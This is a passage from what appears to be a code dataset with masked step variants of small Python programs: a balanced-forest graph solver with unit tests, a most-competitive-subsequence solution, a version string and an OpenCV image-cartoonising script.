6]]\n self.assertEqual(balancedForest(c, edges), expected)\n print('SKIPPED', skipped)\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass Node(object):\n \"\"\"docstring for Node\"\"\"\n\n def __init__(self, value, indentifier):\n super(Node, self).__init__()\n self.value = value\n self.identifier = indentifier\n self.next = None\n\n\nclass Graph(object):\n \"\"\"docstring for Graph\"\"\"\n\n def __init__(self, values, edges):\n super(Graph, self).__init__()\n self.node_values = values\n self.vertices = len(values)\n self.edges = edges\n self.graph = [None] * self.vertices\n self.grand_sum = sum(self.node_values)\n\n def build_adjacency_list(self):\n for edge in self.edges:\n fro = edge[0] - 1\n to = edge[1] - 1\n node = Node(self.node_values[to], to)\n node.next = self.graph[fro]\n self.graph[fro] = node\n node = Node(self.node_values[fro], fro)\n node.next = self.graph[to]\n self.graph[to] = node\n\n def print_graph(self):\n for i in range(self.vertices):\n node = self.graph[i]\n print('Vertex:', i)\n while node != None:\n print(node.value, node.identifier)\n node = node.next\n print('<<' * 20)\n\n def get_tree_nodes(self, start_node, nodes, edge, total):\n if start_node == None:\n return nodes\n while start_node != None:\n if start_node.identifier == edge[0\n ] or start_node.identifier == edge[2\n ] or start_node.identifier in nodes:\n print('skipping ', start_node.identifier)\n else:\n print('adding ', start_node.identifier)\n nodes.append(start_node.identifier)\n total[0] += start_node.value\n next_n = self.graph[start_node.identifier]\n self.get_tree_nodes(next_n, nodes, edge, total)\n start_node = start_node.next\n return nodes\n\n def split_and_compute_tree_sum(self, t1_nodes=[], t2_nodes=[], edge=[],\n ton=False):\n t1_total = 0\n t2_total = 0\n total = [0]\n start_node = self.graph[edge[1]]\n if start_node.next != None:\n t2_nodes = self.get_tree_nodes(start_node, t2_nodes, edge, total)\n if len(t2_nodes) == 0 and edge[1] != edge[2]:\n t2_nodes.append(edge[1])\n total[0] += self.node_values[edge[1]]\n t2_total = total[0]\n if not ton and t2_total < self.grand_sum / 2:\n for i in range(self.vertices):\n if i not in t2_nodes:\n t1_nodes.append(i)\n t1_total = self.grand_sum - t2_total\n print('t2_nodes', t2_nodes)\n print('t2_total', t2_total)\n return t1_total, t2_total\n\n def check(self, tree1_total, tree2_total, tree3_total):\n print('###' * 10)\n print('FINAL tree1_total: ', tree1_total)\n print('FINAL tree2_total: ', tree2_total)\n print('FINAL tree3_total: ', tree3_total)\n print('###' * 10)\n if (tree1_total == tree2_total or tree1_total == tree3_total or \n tree2_total == tree3_total):\n mx = max(tree1_total, tree2_total, tree3_total)\n if [tree1_total, tree2_total, tree3_total].count(mx) >= 2:\n ret = mx - min(tree1_total, tree2_total, tree3_total)\n return ret, True\n return -1, False\n\n def split_tree_into_two(self):\n ret = -1\n found = False\n global skipped\n for entry in range(self.vertices):\n tree1_nodes = []\n tree2_nodes = []\n tree3_nodes = []\n temp_nodes = []\n n = self.graph[entry]\n while n != None:\n edge = [entry, n.identifier, -1]\n if n.identifier <= entry:\n n = n.next\n skipped += 1\n continue\n print('##MAIN##. SPLIT POINT EDGE: ', edge)\n tree1_nodes = []\n tree2_nodes = []\n tree1_total, tree2_total = self.split_and_compute_tree_sum(\n tree1_nodes, tree2_nodes, edge)\n print('ORIGINALS: ', tree1_total, tree2_total)\n if min(tree1_total, tree2_total) < self.grand_sum / 3 or max(\n tree1_total, tree2_total) > 2 * self.grand_sum / 3:\n n = n.next\n continue\n if tree1_total > tree2_total:\n ret, found = self.find_third_tree(tree1_total,\n tree2_total, tree1_nodes, 1, edge[1])\n elif tree2_total > tree1_total:\n ret, found = self.find_third_tree(tree1_total,\n tree2_total, tree2_nodes, 2, edge[0])\n elif tree1_total == tree2_total:\n ret = tree1_total\n found = True\n else:\n found = True\n if found:\n break\n n = n.next\n if found:\n break\n return ret\n\n def find_third_tree(self, tree1_total, tree2_total, nodes, t=1, m=0):\n ret, found = -1, False\n global skipped\n consumed = []\n for i in range(len(nodes)):\n skip_n = nodes[i]\n consumed.append(skip_n)\n n = self.graph[skip_n]\n while n != None:\n if n.identifier in consumed:\n n = n.next\n skipped += 1\n continue\n edge = [skip_n, n.identifier, m]\n print('2. SPLIT POINT EDGE: ', edge)\n print('tree1_total', tree1_total)\n tree3_nodes = []\n temp_nodes = []\n _, tree3_total = self.split_and_compute_tree_sum(temp_nodes,\n tree3_nodes, edge, True)\n if t == 1:\n ret, found = self.check(tree1_total - tree3_total,\n tree2_total, tree3_total)\n elif t == 2:\n ret, found = self.check(tree1_total, tree2_total -\n tree3_total, tree3_total)\n if found:\n break\n n = n.next\n if found:\n break\n return ret, found\n\n\ndef balancedForest(values, edges):\n mygraph = Graph(values, edges)\n mygraph.build_adjacency_list()\n mygraph.print_graph()\n return mygraph.split_tree_into_two()\n\n\n<mask token>\n\n\nclass BalancedForestTest(unittest.TestCase):\n\n def test1(self):\n expected = 10\n c = [1, 1, 1, 18, 10, 11, 5, 6]\n edges = [[1, 2], [1, 4], [2, 3], [1, 8], [8, 7], [7, 6], [5, 7]]\n self.assertEqual(balancedForest(c, edges), expected)\n\n def test2(self):\n expected = 13\n c = [12, 7, 11, 17, 20, 10]\n edges = [[1, 2], [2, 3], [4, 5], [6, 5], [1, 4]]\n self.assertEqual(balancedForest(c, edges), expected)\n\n def test3(self):\n expected = 19\n c = [15, 12, 8, 14, 13]\n edges = [[4, 5], [1, 2], [1, 3], [1, 4]]\n self.assertEqual(balancedForest(c, edges), expected)\n\n def test4(self):\n expected = 2\n c = [1, 2, 2, 1, 1]\n edges = [[1, 2], [1, 3], [3, 5], [1, 4]]\n self.assertEqual(balancedForest(c, edges), expected)\n\n def test5(self):\n expected = -1\n c = [1, 3, 5]\n edges = [[1, 3], [1, 2]]\n self.assertEqual(balancedForest(c, edges), expected)\n\n def test6(self):\n expected = -1\n c = [7, 7, 4, 1, 1, 1]\n edges = [(1, 2), (3, 1), (2, 4), (2, 5), (2, 6)]\n self.assertEqual(balancedForest(c, edges), expected)\n\n def test7(self):\n expected = 0\n c = [1, 3, 4, 4]\n edges = [(1, 2), (1, 3), (1, 4)]\n self.assertEqual(balancedForest(c, edges), expected)\n\n def test8(self):\n expected = 297\n c = [100, 99, 98, 100, 99, 98]\n edges = [[1, 2], [2, 3], [4, 5], [6, 5], [1, 4]]\n self.assertEqual(balancedForest(c, edges), expected)\n\n def test9(self):\n expected = 4\n c = [12, 10, 8, 12, 14, 12]\n edges = [[1, 2], [1, 3], [1, 4], [2, 5], [4, 6]]\n self.assertEqual(balancedForest(c, edges), expected)\n print('SKIPPED', skipped)\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-5": "skipped = 0\n\nclass Node(object):\n \"\"\"docstring for Node\"\"\"\n def __init__(self, value, indentifier):\n super(Node, self).__init__()\n self.value = value\n self.identifier = indentifier\n self.next = None\n\n\nclass Graph(object):\n \"\"\"docstring for Graph\"\"\"\n def __init__(self, values, edges):\n super(Graph, self).__init__()\n self.node_values = values\n self.vertices = len(values)\n self.edges = edges\n self.graph = [None] * self.vertices\n # self.edges.sort()\n self.grand_sum = sum(self.node_values)\n\n def build_adjacency_list(self):\n for edge in self.edges:\n fro = edge[0] - 1\n to = edge[1]- 1\n\n # Adding the node to the source node\n node = Node(self.node_values[to], to)\n node.next = self.graph[fro]\n self.graph[fro] = node\n\n # Adding the source node to the destination as \n # it is the undirected graph \n node = Node(self.node_values[fro], fro)\n node.next = self.graph[to]\n self.graph[to] = node\n\n \n def print_graph(self):\n for i in range(self.vertices):\n node = self.graph[i]\n print(\"Vertex:\", i)\n while(node!=None):\n print(node.value, node.identifier)\n node = node.next\n print(\"<<\"*20)\n\n def get_tree_nodes(self, start_node, nodes, edge, total):\n\n if(start_node==None):\n return nodes\n\n while(start_node!=None):\n if(start_node.identifier==edge[0] or start_node.identifier==edge[2] or (start_node.identifier in nodes)):\n print(\"skipping \", start_node.identifier)\n else:\n print(\"adding \", start_node.identifier)\n nodes.append(start_node.identifier)\n total[0] += start_node.value\n next_n = self.graph[start_node.identifier]\n self.get_tree_nodes(next_n, nodes, edge, total)\n start_node = start_node.next\n return nodes\n\n\n def split_and_compute_tree_sum(self, t1_nodes = [], t2_nodes = [], edge=[], ton = False):\n t1_total = 0\n t2_total = 0\n total = [0]\n \n start_node = self.graph[edge[1]]\n if(start_node.next != None):\n t2_nodes = self.get_tree_nodes(start_node, t2_nodes, edge, total)\n\n if(len(t2_nodes)==0 and edge[1]!=edge[2]):\n t2_nodes.append(edge[1])\n total[0] += self.node_values[edge[1]]\n\n t2_total = total[0]\n if(not ton and t2_total < self.grand_sum/2):\n for i in range(self.vertices):\n if(i not in t2_nodes):\n t1_nodes.append(i)\n\n t1_total = self.grand_sum - t2_total\n\n print(\"t2_nodes\", t2_nodes)\n print(\"t2_total\", t2_total)\n\n return t1_total, t2_total\n\n\n def check(self, tree1_total, tree2_total, tree3_total):\n print(\"###\"*10)\n print(\"FINAL tree1_total: \", tree1_total)\n print(\"FINAL tree2_total: \", tree2_total)\n print(\"FINAL tree3_total: \", tree3_total)\n print(\"###\"*10)\n\n if (tree1_total == tree2_total) or (tree1_total == tree3_total) or (tree2_total == tree3_total):\n mx = max(tree1_total, tree2_total, tree3_total)\n if([tree1_total, tree2_total, tree3_total].count(mx) >= 2):\n ret = mx - min(tree1_total, tree2_total, tree3_total)\n return ret, True\n return -1, False\n\n def split_tree_into_two(self):\n ret = -1\n found = False\n global skipped\n\n for entry in range(self.vertices):\n tree1_nodes = []\n tree2_nodes = []\n tree3_nodes = []\n temp_nodes = []\n\n n = self.graph[entry]\n while(n!=None):\n edge = [entry, n.identifier, -1]\n if(n.identifier <= entry):\n n = n.next\n skipped += 1\n continue\n print(\"##MAIN##. SPLIT POINT EDGE: \", edge)\n tree1_nodes = []\n tree2_nodes = []\n tree1_total, tree2_total = self.split_and_compute_tree_sum(tree1_nodes, tree2_nodes, edge)\n print(\"ORIGINALS: \", tree1_total, tree2_total)\n if(min(tree1_total, tree2_total) < self.grand_sum/3 or (max(tree1_total, tree2_total) > (2*self.grand_sum)/3)):\n n = n.next\n continue\n\n if(tree1_total > tree2_total):\n ret, found = self.find_third_tree(tree1_total, tree2_total,tree1_nodes, 1, edge[1])\n elif(tree2_total > tree1_total):\n ret, found = self.find_third_tree(tree1_total, tree2_total,tree2_nodes, 2, edge[0])\n elif (tree1_total == tree2_total):\n ret = tree1_total\n found = True\n else:\n found = True\n if(found):\n break\n n = n.next\n if(found):\n break\n return ret\n\n\n def find_third_tree(self, tree1_total, tree2_total, nodes, t = 1, m=0):\n\n ret , found = -1, False\n global skipped\n consumed = []\n\n for i in range(len(nodes)):\n skip_n = nodes[i]\n consumed.append(skip_n)\n n = self.graph[skip_n]\n while(n!=None):\n if(n.identifier in consumed):\n n = n.next\n skipped += 1\n continue\n edge = [skip_n, n.identifier, m]\n print(\"2. SPLIT POINT EDGE: \", edge)\n print(\"tree1_total\",tree1_total)\n tree3_nodes = []\n temp_nodes = []\n _,tree3_total = self.split_and_compute_tree_sum(temp_nodes, tree3_nodes, edge, True)\n if(t==1):\n ret , found = self.check(tree1_total - tree3_total, tree2_total, tree3_total)\n elif(t==2):\n ret , found = self.check(tree1_total, tree2_total - tree3_total, tree3_total)\n if(found):\n break\n n = n.next\n if(found):\n break\n\n return ret, found\n\n\ndef balancedForest(values, edges):\n mygraph = Graph(values, edges)\n mygraph.build_adjacency_list()\n mygraph.print_graph()\n return mygraph.split_tree_into_two()\n\nimport unittest\n\nclass BalancedForestTest(unittest.TestCase):\n def test1(self):\n expected = 10\n c = [1, 1, 1, 18, 10, 11, 5, 6]\n edges = [[1, 2], [1, 4], [2, 3], [1, 8], [8, 7], [7, 6], [5, 7]]\n self.assertEqual(balancedForest(c, edges), expected)\n\n def test2(self):\n expected = 13\n c = [12, 7, 11, 17, 20, 10]\n edges = [[1, 2], [2, 3], [4, 5], [6, 5], [1, 4]]\n\n self.assertEqual(balancedForest(c, edges), expected)\n\n def test3(self):\n expected = 19\n c = [15, 12, 8, 14, 13]\n edges = [[4,5],[1,2],[1,3],[1,4]]\n self.assertEqual(balancedForest(c, edges), expected)\n\n def test4(self):\n expected = 2\n c = [1,2,2,1,1]\n edges = [[1,2],[1,3],[3,5],[1,4]]\n self.assertEqual(balancedForest(c, edges), expected)\n\n def test5(self):\n expected = -1\n c = [1,3,5]\n edges = [[1,3],[1,2]]\n self.assertEqual(balancedForest(c, edges), expected)\n\n def test6(self):\n expected = -1\n c = [7, 7, 4, 1, 1, 1]\n edges = [(1, 2), (3, 1), (2, 4), (2, 5), (2, 6)]\n self.assertEqual(balancedForest(c, edges), expected)\n\n def test7(self):\n expected = 0\n c = [1, 3, 4, 4]\n edges = [(1, 2), (1, 3), (1, 4)]\n self.assertEqual(balancedForest(c, edges), expected)\n\n def test8(self):\n expected = 297\n c = [100, 99, 98, 100, 99, 98]\n edges = [[1, 2], [2, 3], [4, 5], [6, 5], [1, 4]]\n self.assertEqual(balancedForest(c, edges), expected)\n\n def test9(self):\n expected = 4\n c = [12, 10, 8, 12, 14, 12]\n edges = [[1, 2], [1, 3], [1, 4], [2, 5], [4, 6]]\n self.assertEqual(balancedForest(c, edges), expected)\n\n print(\"SKIPPED\", skipped)\n\n\nif __name__ == '__main__':\n unittest.main()",
"step-ids": [
7,
22,
24,
25,
28
]
}
|
[
7,
22,
24,
25,
28
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
__version__ = '1.1.3rc0'
|
flexible
|
{
"blob_id": "2e5bbc8c6a5eac2ed71c5d8619bedde2e04ee9a6",
"index": 4932,
"step-1": "<mask token>\n",
"step-2": "__version__ = '1.1.3rc0'\n",
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0,
1
]
}
|
[
0,
1
] |
'''
Given []int, most mostCompetitive subsequence is
a sublist of nums.
So we calculate a score, score is ∀ x ∈ nums, score += x_n - x_n-1
You can remove as many elements are you need to.
What is the mostCompetitive subsequence that you can come up with?
[1,3,5]
[1,3,4] ← More competitive
[1,2,5] ← More competitive
[1,3,4]
This is true b/c we evaluate on the first point where the two differ.
1) We care about creating lists that contain as small of numbers as
possible. The numbers don't need to be in order, they just need to be
small.
We care about all numbers, s.t. we can create a subsequence of k or more
behind them.
Get all possible sub-sequences, with length k or more. If more than k,
iterate through how we can remove the largest elements.
We should also keep track of the smallest number that corresponds to a valid
sequence?
I'm leaning towards a brute force method.
1) Find all sequences of length k. Store the most competitive.
So we should write a function that compares two sequences to see which is more
competitive.
Do one run, with subsequence == k.
Then try to beat that run.
Keep track of what the 'winning' subsequence is, and
iterate through possible values.
So two iterations.
[2,4,3,3,5,4,9,6] | k = 4
( )
ans = 2,4,3,3
[2,4,3,3,5,4,9,6] | k = 4
( )
2,4,3,3
^
idx = 0
Once we have 'beaten' it, out of the remaining
elements, remove the max element until length of
sublist is workable.
[2, 3, 3, ]
1) Write isMoreCompetitive
2) First pass → get most competitive with sliding window len = k
3) Second + pass. If we make a change/'win', re-run again. If re-run and
no change, we are done.
'''
'''
To Review:
def mostCompetitive(self, nums, k):
to_remove = len(nums) - k
stack = []
for x in nums:
while stack and x < stack[-1] and to_remove:
to_remove -= 1
stack.pop()
stack.append(x)
for _ in range(to_remove):
stack.pop()
return stack
'''
class Solution:
# is a more competitive than b?
def isMoreCompetitive(self, a, b):
if len(a) != len(b):
print("Error, len()'s do not match'")
return "Error"
for i in range(len(a)):
if a[i] == b[i]:
continue
elif a[i] < b[i]:
return True
else:
return False
return False
def refined(self, nums, i, a, ans):
if i >= len(nums):
if len(a) == len(ans) and self.isMoreCompetitive(a, ans) == False:
return False, None
elif len(a) != len(ans):
return False, None
else:
return True, a
elif i < len(nums) and len(ans)-len(a) <= len(nums)-i :
boolA, respA = self.refined(nums, i+1, a+[nums[i]], ans)
boolB, respB = self.refined(nums, i+1, a, ans)
if boolA == True and boolB == True:
if self.isMoreCompetitive(respA, respB):
return True, respA
else:
return True, respB
elif boolA == True:
return boolA, respA
elif boolB == True:
return True, respB
else:
return False, None
else:
return False, None
def mostCompetitive(self, nums, k):
if len(nums) < k :
print("length mismatch @ init")
return False
ans = list(nums[0:k])
tmp = list(nums[0:k])
i = k
# Initial pass
while i < len(nums):
# print(tmp)
del tmp[0]
# print(tmp)
tmp.append(nums[i])
# print(tmp)
if self.isMoreCompetitive(tmp, ans):
ans = list(tmp)
i += 1
# print("ans: {}, tmp:{}".format(ans, tmp))
# print("")
# Pass 2
shouldContinue = True
idx = 0
foundAnswer, updateAns = self.refined(nums, 0, [], ans)
if foundAnswer == True:
return updateAns
return ans
if __name__ == '__main__':
s = Solution()
print(s.mostCompetitive([3,5,2,6], 2))
print(s.mostCompetitive([2,4,3,3,5,4,9,6], 4))
print(s.mostCompetitive([84,10,71,23,66,61,62,64,34,41,80,25,91,43,4,75,65,13,37,41,46,90,55,8,85,61,95,71], 24))
print(s.mostCompetitive([2,4,3,3,5,4,9,6], 4))
[11,52,57,91,47,95,86,46,87,47,70,56,54,61,89,44,3,73,1,7,87,48,17,25,49,54,6,72,97,62,16,11,47,34,68,58,14,36,46,65,2,15]
18
|
normal
|
{
"blob_id": "f8b04f374e1c55d4985be793939f0ff9393c29e0",
"index": 2571,
"step-1": "<mask token>\n\n\nclass Solution:\n <mask token>\n\n def refined(self, nums, i, a, ans):\n if i >= len(nums):\n if len(a) == len(ans) and self.isMoreCompetitive(a, ans) == False:\n return False, None\n elif len(a) != len(ans):\n return False, None\n else:\n return True, a\n elif i < len(nums) and len(ans) - len(a) <= len(nums) - i:\n boolA, respA = self.refined(nums, i + 1, a + [nums[i]], ans)\n boolB, respB = self.refined(nums, i + 1, a, ans)\n if boolA == True and boolB == True:\n if self.isMoreCompetitive(respA, respB):\n return True, respA\n else:\n return True, respB\n elif boolA == True:\n return boolA, respA\n elif boolB == True:\n return True, respB\n else:\n return False, None\n else:\n return False, None\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Solution:\n\n def isMoreCompetitive(self, a, b):\n if len(a) != len(b):\n print(\"Error, len()'s do not match'\")\n return 'Error'\n for i in range(len(a)):\n if a[i] == b[i]:\n continue\n elif a[i] < b[i]:\n return True\n else:\n return False\n return False\n\n def refined(self, nums, i, a, ans):\n if i >= len(nums):\n if len(a) == len(ans) and self.isMoreCompetitive(a, ans) == False:\n return False, None\n elif len(a) != len(ans):\n return False, None\n else:\n return True, a\n elif i < len(nums) and len(ans) - len(a) <= len(nums) - i:\n boolA, respA = self.refined(nums, i + 1, a + [nums[i]], ans)\n boolB, respB = self.refined(nums, i + 1, a, ans)\n if boolA == True and boolB == True:\n if self.isMoreCompetitive(respA, respB):\n return True, respA\n else:\n return True, respB\n elif boolA == True:\n return boolA, respA\n elif boolB == True:\n return True, respB\n else:\n return False, None\n else:\n return False, None\n <mask token>\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Solution:\n\n def isMoreCompetitive(self, a, b):\n if len(a) != len(b):\n print(\"Error, len()'s do not match'\")\n return 'Error'\n for i in range(len(a)):\n if a[i] == b[i]:\n continue\n elif a[i] < b[i]:\n return True\n else:\n return False\n return False\n\n def refined(self, nums, i, a, ans):\n if i >= len(nums):\n if len(a) == len(ans) and self.isMoreCompetitive(a, ans) == False:\n return False, None\n elif len(a) != len(ans):\n return False, None\n else:\n return True, a\n elif i < len(nums) and len(ans) - len(a) <= len(nums) - i:\n boolA, respA = self.refined(nums, i + 1, a + [nums[i]], ans)\n boolB, respB = self.refined(nums, i + 1, a, ans)\n if boolA == True and boolB == True:\n if self.isMoreCompetitive(respA, respB):\n return True, respA\n else:\n return True, respB\n elif boolA == True:\n return boolA, respA\n elif boolB == True:\n return True, respB\n else:\n return False, None\n else:\n return False, None\n\n def mostCompetitive(self, nums, k):\n if len(nums) < k:\n print('length mismatch @ init')\n return False\n ans = list(nums[0:k])\n tmp = list(nums[0:k])\n i = k\n while i < len(nums):\n del tmp[0]\n tmp.append(nums[i])\n if self.isMoreCompetitive(tmp, ans):\n ans = list(tmp)\n i += 1\n shouldContinue = True\n idx = 0\n foundAnswer, updateAns = self.refined(nums, 0, [], ans)\n if foundAnswer == True:\n return updateAns\n return ans\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass Solution:\n\n def isMoreCompetitive(self, a, b):\n if len(a) != len(b):\n print(\"Error, len()'s do not match'\")\n return 'Error'\n for i in range(len(a)):\n if a[i] == b[i]:\n continue\n elif a[i] < b[i]:\n return True\n else:\n return False\n return False\n\n def refined(self, nums, i, a, ans):\n if i >= len(nums):\n if len(a) == len(ans) and self.isMoreCompetitive(a, ans) == False:\n return False, None\n elif len(a) != len(ans):\n return False, None\n else:\n return True, a\n elif i < len(nums) and len(ans) - len(a) <= len(nums) - i:\n boolA, respA = self.refined(nums, i + 1, a + [nums[i]], ans)\n boolB, respB = self.refined(nums, i + 1, a, ans)\n if boolA == True and boolB == True:\n if self.isMoreCompetitive(respA, respB):\n return True, respA\n else:\n return True, respB\n elif boolA == True:\n return boolA, respA\n elif boolB == True:\n return True, respB\n else:\n return False, None\n else:\n return False, None\n\n def mostCompetitive(self, nums, k):\n if len(nums) < k:\n print('length mismatch @ init')\n return False\n ans = list(nums[0:k])\n tmp = list(nums[0:k])\n i = k\n while i < len(nums):\n del tmp[0]\n tmp.append(nums[i])\n if self.isMoreCompetitive(tmp, ans):\n ans = list(tmp)\n i += 1\n shouldContinue = True\n idx = 0\n foundAnswer, updateAns = self.refined(nums, 0, [], ans)\n if foundAnswer == True:\n return updateAns\n return ans\n\n\nif __name__ == '__main__':\n s = Solution()\n print(s.mostCompetitive([3, 5, 2, 6], 2))\n print(s.mostCompetitive([2, 4, 3, 3, 5, 4, 9, 6], 4))\n print(s.mostCompetitive([84, 10, 71, 23, 66, 61, 62, 64, 34, 41, 80, 25,\n 91, 43, 4, 75, 65, 13, 37, 41, 46, 90, 55, 8, 85, 61, 95, 71], 24))\n print(s.mostCompetitive([2, 4, 3, 3, 5, 4, 9, 6], 4))\n [11, 52, 57, 91, 47, 95, 86, 46, 87, 47, 70, 56, 54, 61, 89, 44, 3, 73,\n 1, 7, 87, 48, 17, 25, 49, 54, 6, 72, 97, 62, 16, 11, 47, 34, 68, 58,\n 14, 36, 46, 65, 2, 15]\n18\n",
"step-5": "'''\nGiven []int, most mostCompetitive subsequence is\na sublist of nums.\n\nSo we calculate a score, score is ∀ x ∈ nums, score += x_n - x_n-1\n\nYou can remove as many elements are you need to.\n\nWhat is the mostCompetitive subsequence that you can come up with?\n\n[1,3,5]\n[1,3,4] ← More competitive\n\n[1,2,5] ← More competitive\n[1,3,4]\n\nThis is true b/c we evaluate on the first point where the two differ.\n\n1) We care about creating lists that contain as small of numbers as\npossible. The numbers don't need to be in order, they just need to be\nsmall.\n\nWe care about all numbers, s.t. we can create a subsequence of k or more\nbehind them.\n\nGet all possible sub-sequences, with length k or more. If more than k,\niterate through how we can remove the largest elements.\n\nWe should also keep track of the smallest number that corresponds to a valid\nsequence?\n\nI'm leaning towards a brute force method.\n\n1) Find all sequences of length k. Store the most competitive.\n\n\nSo we should write a function that compares two sequences to see which is more\ncompetitive.\n\nDo one run, with subsequence == k.\nThen try to beat that run.\n\nKeep track of what the 'winning' subsequence is, and\niterate through possible values.\n\nSo two iterations.\n\n[2,4,3,3,5,4,9,6] | k = 4\n ( )\n\nans = 2,4,3,3\n\n\n\n[2,4,3,3,5,4,9,6] | k = 4\n( )\n\n2,4,3,3\n ^\n\nidx = 0\n\nOnce we have 'beaten' it, out of the remaining\nelements, remove the max element until length of\nsublist is workable.\n\n\n[2, 3, 3, ]\n\n1) Write isMoreCompetitive\n2) First pass → get most competitive with sliding window len = k\n3) Second + pass. If we make a change/'win', re-run again. If re-run and\n no change, we are done.\n\n'''\n\n'''\nTo Review:\n\ndef mostCompetitive(self, nums, k):\n to_remove = len(nums) - k\n stack = []\n\n for x in nums:\n while stack and x < stack[-1] and to_remove:\n to_remove -= 1\n stack.pop()\n stack.append(x)\n\n for _ in range(to_remove):\n stack.pop()\n\n return stack\n'''\n\n\n\nclass Solution:\n\n # is a more competitive than b?\n def isMoreCompetitive(self, a, b):\n if len(a) != len(b):\n print(\"Error, len()'s do not match'\")\n return \"Error\"\n\n for i in range(len(a)):\n if a[i] == b[i]:\n continue\n elif a[i] < b[i]:\n return True\n else:\n return False\n\n return False\n\n def refined(self, nums, i, a, ans):\n if i >= len(nums):\n if len(a) == len(ans) and self.isMoreCompetitive(a, ans) == False:\n return False, None\n\n elif len(a) != len(ans):\n return False, None\n\n else:\n return True, a\n\n elif i < len(nums) and len(ans)-len(a) <= len(nums)-i :\n boolA, respA = self.refined(nums, i+1, a+[nums[i]], ans)\n boolB, respB = self.refined(nums, i+1, a, ans)\n\n if boolA == True and boolB == True:\n if self.isMoreCompetitive(respA, respB):\n return True, respA\n else:\n return True, respB\n\n elif boolA == True:\n return boolA, respA\n\n elif boolB == True:\n return True, respB\n\n else:\n return False, None\n\n else:\n return False, None\n\n\n\n def mostCompetitive(self, nums, k):\n\n if len(nums) < k :\n print(\"length mismatch @ init\")\n return False\n\n ans = list(nums[0:k])\n tmp = list(nums[0:k])\n i = k\n\n # Initial pass\n while i < len(nums):\n # print(tmp)\n del tmp[0]\n # print(tmp)\n tmp.append(nums[i])\n # print(tmp)\n if self.isMoreCompetitive(tmp, ans):\n ans = list(tmp)\n i += 1\n # print(\"ans: {}, tmp:{}\".format(ans, tmp))\n # print(\"\")\n\n # Pass 2\n shouldContinue = True\n idx = 0\n\n foundAnswer, updateAns = self.refined(nums, 0, [], ans)\n\n if foundAnswer == True:\n return updateAns\n\n return ans\n\n\n\n\nif __name__ == '__main__':\n s = Solution()\n\n print(s.mostCompetitive([3,5,2,6], 2))\n print(s.mostCompetitive([2,4,3,3,5,4,9,6], 4))\n print(s.mostCompetitive([84,10,71,23,66,61,62,64,34,41,80,25,91,43,4,75,65,13,37,41,46,90,55,8,85,61,95,71], 24))\n print(s.mostCompetitive([2,4,3,3,5,4,9,6], 4))\n\n\n [11,52,57,91,47,95,86,46,87,47,70,56,54,61,89,44,3,73,1,7,87,48,17,25,49,54,6,72,97,62,16,11,47,34,68,58,14,36,46,65,2,15]\n18\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
# -*- coding: utf-8 -*-
"""
Created on Thu Sep 3 18:45:08 2020
@author: Neeraj
"""
import cv2
import numpy as np
num_down=2
num_bilateral=50
img_rgb=cv2.imread("stunning-latest-pics-of-Kajal-Agarwal.jpg") #image path
img_rgb=cv2.resize(img_rgb,(800,800))
img_color=img_rgb
for _ in range(num_down):
img_color=cv2.pyrDown(img_color)
for _ in range(num_bilateral):
img_color=cv2.bilateralFilter(img_color,d=9,
sigmaColor=9,
sigmaSpace=7)
for _ in range(num_down):
img_color=cv2.pyrUp(img_color)
img_gray=cv2.cvtColor(img_rgb,cv2.COLOR_RGB2GRAY)
img_blur=cv2.medianBlur(img_gray,7)
img_edge=cv2.adaptiveThreshold(img_blur,255,
cv2.ADAPTIVE_THRESH_MEAN_C,
cv2.THRESH_BINARY,
blockSize=9,
C=2)
img_edge=cv2.cvtColor(img_edge,cv2.COLOR_GRAY2RGB)
img_sketch=cv2.bitwise_and(img_color,img_edge)
#displaying the actual and sketched images
stack=np.hstack([img_rgb,img_sketch])
# cv2.imshow("stacked",stack)
# cv2.waitKey(0)
cv2.imwrite("cartoon1.jpg",stack) #to save the image
|
normal
|
{
"blob_id": "16db443642746af4ae45862627baaa9eca54a165",
"index": 3138,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor _ in range(num_down):\n img_color = cv2.pyrDown(img_color)\nfor _ in range(num_bilateral):\n img_color = cv2.bilateralFilter(img_color, d=9, sigmaColor=9, sigmaSpace=7)\nfor _ in range(num_down):\n img_color = cv2.pyrUp(img_color)\n<mask token>\ncv2.imwrite('cartoon1.jpg', stack)\n",
"step-3": "<mask token>\nnum_down = 2\nnum_bilateral = 50\nimg_rgb = cv2.imread('stunning-latest-pics-of-Kajal-Agarwal.jpg')\nimg_rgb = cv2.resize(img_rgb, (800, 800))\nimg_color = img_rgb\nfor _ in range(num_down):\n img_color = cv2.pyrDown(img_color)\nfor _ in range(num_bilateral):\n img_color = cv2.bilateralFilter(img_color, d=9, sigmaColor=9, sigmaSpace=7)\nfor _ in range(num_down):\n img_color = cv2.pyrUp(img_color)\nimg_gray = cv2.cvtColor(img_rgb, cv2.COLOR_RGB2GRAY)\nimg_blur = cv2.medianBlur(img_gray, 7)\nimg_edge = cv2.adaptiveThreshold(img_blur, 255, cv2.ADAPTIVE_THRESH_MEAN_C,\n cv2.THRESH_BINARY, blockSize=9, C=2)\nimg_edge = cv2.cvtColor(img_edge, cv2.COLOR_GRAY2RGB)\nimg_sketch = cv2.bitwise_and(img_color, img_edge)\nstack = np.hstack([img_rgb, img_sketch])\ncv2.imwrite('cartoon1.jpg', stack)\n",
